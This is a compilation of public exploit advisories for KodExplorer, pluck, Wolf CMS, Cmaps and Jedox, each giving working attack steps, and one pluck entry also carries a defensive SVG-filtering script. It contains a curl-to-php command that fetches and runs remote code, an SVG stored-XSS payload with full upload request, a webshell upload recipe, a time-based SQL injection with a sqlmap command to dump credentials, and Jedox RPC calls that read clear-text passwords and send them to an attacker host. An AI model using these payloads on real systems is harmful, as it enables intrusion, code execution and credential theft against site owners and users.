## Title: KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.30.2023
## Vendor: https://kodcloud.com/
## Software: https://github.com/kalcaddle/KodExplorer/releases/tag/4.51.03
## Reference: https://portswigger.net/web-security/file-upload

## Description:
By using this vulnerability remotely, the malicious pwned_admin can list and manipulate all files inside the server. This is an absolutely DANGEROUS and STUPID decision from the application owner! In this scenario, the attacker prepares the machine for exploitation and sends a link for remote execution, fetched with curl, to his supporter, another attacker. Then he waits for his colleague to execute it, to mask his actions or worse. What a nice hack is this! :)

STATUS: CRITICAL Vulnerability

[+]Exploit:
```shell
curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/BiggusDickus.php | php
curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/dealdir.php | php
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kalcaddle/2023/KodExplorerKodExplorer-4.51.03)

## Proof and Exploit:
[href](https://streamable.com/98npd0)

## Time spent: 01:15:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
-
pluck v4.7.18 - Stored Cross-Site Scripting (XSS)
Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)
Application: pluck
Version: 4.7.18
Bugs: XSS
Technology: PHP
Vendor URL: https://github.com/pluck-cms/pluck
Software Link: https://github.com/pluck-cms/pluck
Date found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
Steps:

1. Create an .svg file.
2. SVG file content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>

3. Upload the file (http://localhost/pluck-4.7.18/admin.php?action=files)

PoC request:

POST /pluck-4.7.18/admin.php?action=files HTTP/1.1
Host: localhost
Content-Length: 672
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/pluck-4.7.18/admin.php?action=files
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de
Connection: close

------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>
------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="submit"

Upload
------WebKitFormBoundaryJMTiFxESCx7aNqmI--

4. Go to http://localhost/pluck-4.7.18/files/svg_xss.svg
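The upload in step 3 is accepted because the file manager treats the SVG as an image, while the browser in step 4 renders it as a document and runs the embedded script. Added example (not part of the pluck project or of the advisory): a standard-library Python check that an upload handler could run to reject SVG files carrying active content (script elements, event-handler attributes, javascript: or data: links, foreignObject) before storing them. The sample SVGs are constructed; the first is the file from the steps above, the second the same drawing without the script.

```python
import xml.etree.ElementTree as ET

# Constructed samples. MALICIOUS_SVG is the file used in the steps above;
# BENIGN_SVG is the same triangle without the <script> element.
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>
"""

BENIGN_SVG = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>
"""

# Elements that execute script or embed foreign (HTML) content.
DANGEROUS_TAGS = {"script", "foreignObject"}
# URL schemes that turn a link or reference into executable content.
DANGEROUS_SCHEMES = ("javascript:", "data:")


def _local(name):
    """Strip the '{namespace}' prefix ElementTree puts on tag/attribute names."""
    return name.rsplit("}", 1)[-1]


def svg_active_content(svg_bytes):
    """Return a list of findings describing active content in the SVG.
    An empty list means nothing dangerous was found."""
    findings = []
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        # Not well-formed XML: reject rather than guess what a browser would do.
        return [f"not well-formed XML: {exc}"]

    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in DANGEROUS_TAGS:
            findings.append(f"<{tag}> element")
        for name, value in elem.attrib.items():
            attr = _local(name)
            if attr.lower().startswith("on"):
                # onload, onclick, onerror, ... all run script.
                findings.append(f"event handler attribute {attr} on <{tag}>")
            elif attr.lower() == "href" and value.strip().lower().startswith(DANGEROUS_SCHEMES):
                scheme = value.strip().lower().split(":", 1)[0]
                findings.append(f"href with {scheme}: scheme on <{tag}>")
    return findings


def is_safe_svg_upload(svg_bytes):
    """True when the SVG can be stored as an image without active content."""
    return not svg_active_content(svg_bytes)


if __name__ == "__main__":
    for label, data in (("advisory SVG", MALICIOUS_SVG), ("benign SVG", BENIGN_SVG)):
        print(label, "->", svg_active_content(data) or "no active content")
```

The check is a content filter, not a substitute for serving user uploads in a way that prevents step 4 from being a same-origin navigation: delivering them with `Content-Disposition: attachment` or from a separate origin stops an SVG from running script in the application's context even when a filter misses something. When the input is fully untrusted, parse it with `defusedxml` instead of `xml.etree` so entity-expansion payloads cannot exhaust the parser.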
-
Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
# Exploit Title: Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
# Date: 2023-05-02
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://wolf-cms.readthedocs.io
# Software Link: https://github.com/wolfcms/wolfcms
# Version: 0.8.3.1
# Tested on: Kali Linux

### Steps to Reproduce ###

# Firstly, go to the "Files" tab.
# Click on the "Create new file" button and create a PHP file (e.g. shell.php).
# Then, click on the file you created to edit it.
# Now, enter your shell code and save the file.
# Finally, go to https://localhost/wolfcms/public/shell.php

### There's your shell! ###
-
Cmaps v8.0 - SQL injection
# Exploit Title: Cmaps v8.0 - SQL injection
- Date: 27.04.2023
- Exploit Author: Lucas Noki (0xPrototype)
- Vendor Homepage: https://github.com/vogtmh
- Software Link: https://github.com/vogtmh/cmaps
- Version: 8.0
- Tested on: Mac, Windows, Linux
- CVE : CVE-2023-29809

*Description:*
The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page
http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test
we get the normal JSON response. However, if a single quote is appended to the value of the `bookmap` parameter, we get an error message:

```html
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />
```

If two single quotes are appended instead, we get the normal response without an error. This confirms the opportunity for SQL injection: the quote characters reach the SQL parser unescaped, so a single quote breaks the query and a pair of quotes forms a valid empty string. To really prove the SQL injection we append the following payload:

```
'-(select*from(select+sleep(2)+from+dual)a)--+
```

The page will sleep for two seconds. This confirms the SQL injection.

*Steps to reproduce:*
1. Send the following payload to test the vulnerability: `'-(select*from(select+sleep(2)+from+dual)a)--+`
2. If the site slept for two seconds, run the following sqlmap command to dump the whole database, including the LDAP credentials:

```shell
python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
```

Special thanks go out to iCaotix, who greatly helped me in getting the environment set up as well as debugging my payload.

## Request to the server:
(Screenshot: Screenshot 2023-04-30 at 22.23.51.png; image not included in this copy)

## Response from the server:
Look at the response time.
(Screenshot: Screenshot 2023-04-30 at 22.24.35.png; image not included in this copy)
-
Jedox 2022.4.2 - Code Execution via RPC Interfaces
# Exploit Title: Jedox 2022.4.2 - Code Execution via RPC Interfaces
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2022.4 (22.4.2) and older
# CVE : CVE-2022-47879

Introduction
=================
A Remote Code Execution (RCE) vulnerability in /be/rpc.php and /be/erpc.php allows remote authenticated users to load arbitrary PHP classes from the rtn directory and to execute their methods. To exploit this vulnerability, the attacker needs knowledge about loadable classes, their methods and arguments.

Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

Proof of Concept
=================
1) The `Studio::getUserCreds` function can be used to read the clear-text credentials of the currently authenticated user.

PATH: /be/rpc.php
METHOD: POST
BODY:
[["Studio", "getUserCreds"]]

2) Using the function `conn::test_palo`, an outgoing HTTP connection can be initiated from the web server to an attacker-controlled server (specify HOST and PORT) with the authenticated user's credentials. This could leak clear-text credentials to an attacker.

PATH: /be/rpc.php
METHOD: POST
BODY:
[["conn", "test_palo", ["<HOST>", "<PORT>", "", "", true, null]]]

3) The function `Studio::getExternURI` can be used to generate a URL with the embedded username and encrypted password of the currently authenticated user.

PATH: /be/rpc.php
METHOD: POST
BODY:
[["Studio", "getExternURI", [0, "", [0], {"flag": 1}]]]

4) List all available database connections via `conn::ls`:

PATH: /be/rpc.php
METHOD: POST
BODY:
[["conn", "ls", [null, false, true, ["type", "active", "description"]]]]

5) Retrieve the details of an individual database connection (specify the connection name via CONNECTION), including encrypted credentials, using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:

PATH: /tc/rpc
METHOD: POST
BODY:
[["com.jedox.etl.mngr.Connections", "getGlobalConnection", ["<CONNECTION>"]]]

6) Some functions return credentials only in encrypted form. However, they can be decrypted by any user using `common::decrypt` (specify the encrypted credentials via ENCRYPTEDCREDS):

PATH: /be/rpc.php
METHOD: POST
BODY:
[["common", "decrypt", ["<ENCRYPTEDCREDS>"]]]

7) Using `common::paloGet` it is possible to read arbitrary configuration parameters (specify the config parameter via CONFIG). For example, the password of the SMTP server can be read with it (CONFIG: tasks.smtp.password):

PATH: /be/rpc.php
METHOD: POST
BODY:
[
  [
    "common",
    "paloGet",
    [
      null,
      "Config",
      "#_config",
      ["config"],
      {"config": ["<CONFIG>"]},
      true,
      true
    ]
  ]
]

8) The function `palo_mgmt::sess_list` can be used to retrieve a list of all active user sessions. The session information includes not only the username but also the user's IP address, information about the browser and other data.

PATH: /be/rpc.php
METHOD: POST
BODY:
[["palo_mgmt", "sess_list", [null]]]

9) The function `palo_mgmt::lic_users_list` returns a list of all users stored in the system:

PATH: /be/rpc.php
METHOD: POST
BODY:
[["palo_mgmt", "lic_users_list", ["0"]]]
-
Jedox 2022.4.2 - Remote Code Execution via Directory Traversal
# Exploit Title: Jedox 2022.4.2 - Remote Code Execution via Directory Traversal
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2022.4 (22.4.2) and older
# CVE : CVE-2022-47875

Introduction
=================
A Directory Traversal vulnerability in /be/erpc.php allows remote authenticated users to execute arbitrary code. To exploit the vulnerability, the attacker must have permission to upload files.

Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

Proof of Concept
=================
1) This vulnerability can be exploited by first uploading a file using one of the existing file upload mechanisms (e.g. Import in Designer). When uploading a file, the web application returns the file system path in the JSON body of the HTTP response (look for `fspath`).

2) Upload a PHP file and note the file system path (`fspath`).

3) Get RCE via Directory Traversal:

PATH: /be/erpc.php?c=../../../../../fspath/of/uploaded/file/rce.php
METHOD: POST